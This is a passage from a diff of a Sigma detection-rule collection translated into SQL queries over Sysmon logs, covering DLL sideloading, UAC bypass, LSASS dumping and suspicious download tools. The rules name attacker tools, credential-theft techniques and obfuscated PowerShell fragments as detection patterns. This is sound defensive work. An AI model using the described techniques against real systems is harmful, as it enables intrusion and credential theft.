ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_hiding_malware_in_fonts_folder.yml" + "filename": "image_load_office_dotnet_assembly_dll_load.yml" }, { - "title": "TrustedPath UAC Bypass Pattern", - "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "title": "Wmiprvse Wbemcomn DLL Hijack", + "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", "status": "test", - "description": "Detects indicators of a UAC bypass method by mocking directories", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_trustedpath.yml" + "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Suspicious Spool Service Child Process", - "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", + "title": "Active Directory Parsing DLL Loaded Via Office Application", + "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", "status": "test", - "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", - "author": "Justin C. 
(@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", + "description": "Detects DSParse DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068" + "attack.t1204.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((Image LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\write.exe' ESCAPE '\\' OR Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add 
portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" + "filename": "image_load_office_dsparse_dll_load.yml" }, { - "title": "Script Event Consumer Spawning Process", - "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", + "title": "Potential DLL Sideloading Via ClassicExplorer32.dll", + "id": "caa02837-f659-466f-bca6-48bde2826ab4", "status": "experimental", - "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", - "author": "Sittikorn S", + "description": "Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\ClassicExplorer32.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Classic Shell\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_scrcons_susp_child_process.yml" + "filename": "image_load_side_load_classicexplorer32.yml" }, { - "title": "Suspicious PowerShell Child Processes", - "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", - "status": "experimental", - "description": "Detects suspicious child processes spawned by PowerShell", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "FoggyWeb Backdoor DLL Loading", + "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", + "status": "test", + "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. 
Which loads a malicious version of the expected \"version.dll\" dll", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.resource_development", + "attack.t1587" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_child_processes.yml" + "filename": "image_load_malware_foggyweb_nobelium.yml" }, { - "title": "Suspicious Obfuscated PowerShell Code", - "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", + "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", "status": "experimental", - "description": 
"Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE 
'%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '\tC:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_encoded_obfusc.yml" + "filename": "image_load_dll_vssapi_susp_load.yml" }, { - "title": "Suspicious Download Via Certutil.EXE", - "id": "19b08b1c-861d-4e75-a1ef-ea0c1baf202b", - "status": "test", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files.", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Antivirus Software DLL Sideloading", + "id": "552b6b65-df37-4d3e-a258-f2fc4771ae54", + "status": "experimental", + "description": "Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Applications that load the same dlls mentioned in the detection section. 
Investigate them and filter them out if a lot FPs are caused.", + "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", + "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((((ImageLoaded LIKE '%\\\\log.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\TelemetryUtility.exe' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\plugin\\\\log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\log.dll' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Canon\\\\MyPrinter\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\qrt.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\')))) OR ((ImageLoaded LIKE '%\\\\ashldres.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockdown.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsodscpl.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\McAfee\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\McAfee\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\vftrace.dll' 
ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\wsc.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\tmdbglog.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\DLPPREM32.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\ESET%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\ESET%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_certutil_download.yml" + "filename": "image_load_side_load_antivirus.yml" }, { - "title": "Control Panel Items", - "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", + "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", "status": "test", - "description": "Detects the malicious use of a control panel item", - "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218.002", - "attack.persistence", - "attack.t1546" 
+ "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" ], - "filename": "proc_creation_win_control_panel_item.yml" + "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" }, { - "title": "Potential Download/Upload Activity Using Type Command", - "id": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", + "title": "DLL Sideloading Of DBGCORE.DLL", + "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", "status": "experimental", - "description": "Detects usage of the \"type\" command to download/upload data from WebDAV server", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DLL sideloading of \"dbgcore.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs 
WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > \\\\\\\\\\*' ESCAPE '\\') OR (CommandLine LIKE '%type \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_type.yml" + "filename": "image_load_side_load_dbgcore_dll.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher", - "id": "b222df08-0e07-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Potential DLL Sideloading Via comctl32.dll", + "id": "6360757a-d460-456c-8b13-74cf0e60cceb", + "status": "experimental", + "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE 
'%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" + "filename": "image_load_side_load_comctl32.yml" }, { - "title": "Windows Update Client LOLBIN", - "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "title": "UAC Bypass Using Iscsicpl - ImageLoad", + "id": "9ed5959a-c43c-4c59-84e3-d28628429456", "status": "experimental", - "description": "Detects code execution via the Windows Update client (wuauclt)", - "author": "FPT.EagleEye Team", + "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1105", - "attack.t1218" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND 
CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wuauclt_execution.yml" + "filename": "image_load_uac_bypass_iscsicpl.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", - "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "title": "Time Travel Debugging Utility Usage - Image", + "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects usage of Time Travel Debugging Utility. 
Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" + "filename": "image_load_tttracer_mod_load.yml" }, { - "title": "PUA - Nmap/Zenmap Execution", - "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", - "status": "test", - "description": "Detects usage of namp/zenmap. 
